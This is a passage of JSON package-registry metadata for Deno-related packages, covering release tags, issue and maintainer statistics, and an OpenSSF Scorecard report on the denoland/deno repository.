s/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:14:52.883Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.673509187807873,"dependent_packages_count":42.42110430437969,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.04730674609378},"purl":"pkg:maven/org.mvnpm.at.deno/linux-arm64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-arm64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-arm64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:linux-arm64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4076652,"name":"eszip","ecosystem":"cargo","description":"A utility that can download JavaScript and TypeScript module graphs and store them locally in a special zip file","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":168,"first_release_published_at":"2021-02-15T15:34:41.757Z","latest_release_published_at":"2026-08-27T15:22:29.437Z","latest_release_number":"0.136.0","last_synced_at":"2026-09-07T22:53:53.753Z","created_at":"2022-04-12T11:52:01.343Z","updated_at":"2026-09-07T22:53:53.754Z","registry_url":"https://crates.io/crates/eszip/","install_command":"cargo install eszip","documentation_url":"https://docs.rs/eszip/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using 